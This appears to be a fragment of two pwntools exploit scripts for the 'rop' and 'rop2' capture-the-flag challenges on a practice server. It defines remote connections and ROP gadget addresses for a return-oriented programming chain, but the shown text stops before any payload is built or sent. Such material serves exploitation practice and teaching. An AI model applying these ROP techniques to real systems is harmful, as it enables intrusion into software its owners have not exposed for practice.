#p = process('./rop') #p = gdb.debug('./rop', 'b *0x08048893') p = remote('hackme.inndy.tw', 7704) e = ELF('./rop')
bss_addr = e.bss() write2ecx = 0x0804b5ba# pop dword ptr [ecx] ; ret pop_ecx_ret = 0x080de769# pop ecx ; ret pop_eax_ret = 0x080b8016# pop eax ; ret #pop_ebx_ret = 0x080481c9 # pop ebx ; ret pop_edx_ecx_ebx_ret = 0x0806ed00# pop edx ; pop ecx ; pop ebx ; ret int_0x80 = 0x0806c943# int 0x80
#p = process('rop2') #p = gdb.debug('./rop2', 'b *0x8048454') p = remote('hackme.inndy.tw', 7703) e = ELF('rop2')
syscall_addr = e.plt['syscall'] write2eax = 0x0804844e# pop dword ptr [eax] ; ret pop_eax_edx_ecx_ret = 0x0804843e# pop eax ; pop edx ; pop ecx ; ret bss_addr = e.bss()